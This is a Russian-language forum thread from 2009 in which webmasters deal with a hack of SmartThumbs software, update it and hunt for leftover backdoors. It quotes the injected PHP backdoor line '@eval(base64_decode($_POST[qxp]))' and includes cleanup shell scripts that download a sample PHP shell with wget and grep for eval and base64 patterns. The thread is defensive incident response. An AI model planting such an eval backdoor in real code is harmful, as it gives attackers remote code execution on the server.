Master-X
Форум | Новости | Статьи
Главная » Форум » CJs » 
Тема: SmartThumbs HACKED again
цитата
09/10/09 в 08:04
 iron-man
version 5.76 released Обновляемся...
цитата
09/10/09 в 09:26
 densa
Ага оперативно новую версии сделали, обновление уже часов 5 как доступно
цитата
09/10/09 в 09:36
 basta
кто-нибудь может потестить, возможен ли этот же хак на новой версии с дефолными секьюрными настройками (после запуска secure.php) ?
цитата
09/10/09 в 10:07
 Soft-Com
проверил, старый запрос не работает, так что можно обновляться.

но они кодировщика с зенда на ионкуб поменяли, пока ле получается посмотреть что они поменяли.
цитата
09/10/09 в 10:22
 basta
ясно, спасибо
Обновился я сразу, просто хотелось знать, нужно ли дополнительные степени защиты вводить )
цитата
09/10/09 в 13:42
 bizz
обновился, но попрежнему gallery.php - unknown file, других следов взлома небыло. это нормально ?
цитата
09/10/09 в 13:47
 Soft-Com
удали этот файл, он был в пакете смарта года 2 назад, и уже давно не нужен
цитата
09/10/09 в 13:48
 yo
стер файлы в папке /thumbs, удалил несвоего юзера в st и в базе, стер файлы в /tmp, обновил до новой версии st, залочил ее,
стираю в variables.php @eval(base64_decode($_POST[qxp]));//'; но при сохранении general settings, строчка снова появляется.
она сама по себе может навредить? если да, то как с этим справиться?
цитата
09/10/09 в 13:58
 Soft-Com
есть access_log веб-сервера?

если чтрочка появляется значит у тебя уязвимость осталась, или остались на сервере файлы с php-shell'ом
цитата
09/10/09 в 14:18
 MadDok
+1 eval опять появляется после сохранения general settings.
в /thumbs/ php файлы отсутствуют.
цитата
09/10/09 в 14:24
 Soft-Com
Код:

cd /home/httpd [заменить на дир с контентом доменов]
wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'

for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done

find /home/httpd/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \;  [заменить на дир с контентом доменов]


сделай плс и вывод скинь
цитата
09/10/09 в 14:36
 zuborg
Soft-Com писал:
проверил, старый запрос не работает, так что можно обновляться.


Подтверждаю, старый не работает.
цитата
09/10/09 в 14:45
 MadDok
[root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
find: -exec: no terminating ";" or "+"
[root@ /home/.../domain.com/public_html]#
цитата
09/10/09 в 14:49
 Soft-Com
MadDok писал:

[root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
find: -exec: no terminating ";" or "+"
[root@ /home/.../domain.com/public_html]#


ошибки в самом скрипте

скинь сюда код
цитата
09/10/09 в 14:50
 MadDok
Код:
cd /home/.../domain.com/public_html/
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/.../domain.com/public_html/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \
цитата
09/10/09 в 14:56
 Soft-Com
что-то ты не то скопировал
1. wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php - пример шелла, он 90% такой же как у тебя

2. {} \ - тут нехватает ";" - должно быть
{} \;

предыдущий пост мой прочитай внимательно
цитата
09/10/09 в 14:58
 MadDok
так я шел с твоего сайта скопировал, просто в fin.sh не вставил команду копирования, ибо зачем еще раз его копировать то? ;) №2 сейчас сделаю.
цитата
09/10/09 в 15:03
 MadDok
теперь говорит:
Код:
[root@ /home/.../domain.com/public_html]# ./fin.sh
diff: ./gals/gal1/p2.php_files/st_bd.php: No such file or directory
[root@ /home/.../domain.com/public_html]#


код fin.sh
Код:
wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
cd /home/.../domain.com/public_html/
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'
for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done
find /home/.../domain.com/public_html/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \;


Последний раз редактировалось: MadDok (09/10/09 в 15:06), всего редактировалось 1 раз
цитата
09/10/09 в 15:06
 yo
Цитата:
есть access_log веб-сервера?
если чтрочка появляется значит у тебя уязвимость осталась, или остались на сервере файлы с php-shell'ом.

не понял, о какой строчке идет речь? у меня есть access_log апача и access.log nginx'a - что нужно посмотреть?

Код:
cd /home/httpd [заменить на дир с контентом доменов]
wget -q http://soft-com.biz/st_bd.txt -O /tmp/st_bd.php
find ./ -name \*.php\* -exec diff -qs /tmp/st_bd.php {} \; | grep identical | awk '{print $4}'

for i in `locate st/admin/variables.php`; do grep -HE '(include|eval)' $i; if [ $? = 0 ]; then ls -lah $i; fi; done

find /home/httpd/ -name \*.php -exec grep -H "gzuncompress(base64_decode" {} \;  [заменить на дир с контентом доменов]


никаких результатов не выводит.
цитата
09/10/09 в 15:12
 yo
... и снова появился sess файл в /tmp. что делать? icon_cry.gif
цитата
09/10/09 в 15:15
 MadDok
sess это сессии.
цитата
09/10/09 в 15:19
 yo
MadDok: ну а ты справился со своей вирей? если да, то как?
цитата
09/10/09 в 15:21
 MadDok
yo: нет, жду что софт-ком ответит. Просто пока на все variables.php стоит доступ только для чтения.
цитата
09/10/09 в 16:35
 Soft-Com
YO:
файлы взломщиков - *ses.tmp (хз, может они форумы читают, уже как минимум в 3х форумах идёт активное обсуждение и таблетки, так что и поменять могли)

MadDok:
diff: ./gals/gal1/p2.php_files/st_bd.php: - нет файла, котырй должен быть вытянут вгетом, у тебя ошибка в скрипте
цитата
09/10/09 в 16:37
 MadDok
Soft-Com: а где именно ошибка? Я же тебе код полный вставил.
Стр. « первая   <  1, 2, 3, 4  >  последняя »


Эта страница в полной версии